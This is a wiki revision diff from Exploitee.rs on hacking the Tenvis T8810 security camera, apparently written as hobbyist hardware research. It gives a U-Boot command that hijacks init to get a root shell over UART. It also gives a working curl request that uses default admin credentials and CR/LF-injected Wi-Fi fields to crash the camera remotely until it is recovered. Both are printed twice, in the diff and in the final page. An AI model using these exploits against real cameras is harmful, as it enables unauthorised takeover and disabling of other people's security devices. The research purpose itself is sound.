Difference between revisions of "Tenvis T8810"
From Exploitee.rs
Jump to navigationJump to search
0x00string (talk | contribs) (Created page with "__FORCETOC__ {{Disclaimer}} 120px|left|thumb Category:Networking =Tenvis T8810= == Purchase == Buying devices is expensive and, in a lot of ca...") |
|||
| (4 intermediate revisions by 2 users not shown) | |||
| Line 1: | Line 1: | ||
__FORCETOC__ | __FORCETOC__ | ||
{{Disclaimer}} | {{Disclaimer}} | ||
[[File: | [[File:TENVIS_T8110.JPG|120px|left|thumb]] | ||
[[Category:Networking]] | [[Category:Networking]] | ||
| Line 9: | Line 9: | ||
== Purchase == | == Purchase == | ||
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. | Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. | ||
[https://www.amazon.com/dp/B01MFBBYO8 Purchase the Tenvis T8810 at Amazon] | [https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon] | ||
== | ==UART Root== | ||
The UART interface on this device is located [pictured], and runs at | The UART interface on this device is located on the main board, above the power connector [pictured], and runs at 115200, 8n1 and auto boots to a Linux kernel after a three second delay in U-Boot. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh, as seen below: | ||
<pre> | <pre style="white-space: pre-wrap;"> | ||
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm | setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm | ||
</pre> | </pre> | ||
<gallery> | <gallery> | ||
TENVIS_T8110_UART.JPG | |||
</gallery> | </gallery> | ||
=== Demo === | |||
{{#ev:youtube|nxnVUVMNO5Y}} | |||
==Remote Denial of Service== | ==Remote Denial of Service== | ||
| Line 30: | Line 33: | ||
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered. | Sending the following request will cause the device to crash, and remain in an inoperable state until recovered. | ||
<pre> | <pre style="white-space: pre-wrap;"> | ||
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed | curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed | ||
<pre> | <pre> | ||
Latest revision as of 01:08, 11 August 2017
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
Tenvis T8810
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Tenvis T8810 at Amazon
UART Root
The UART interface on this device is located on the main board, above the power connector [pictured], and runs at 115200, 8n1 and auto boots to a Linux kernel after a three second delay in U-Boot. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh, as seen below:
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
Demo
Remote Denial of Service
WARNING
This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.
Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed
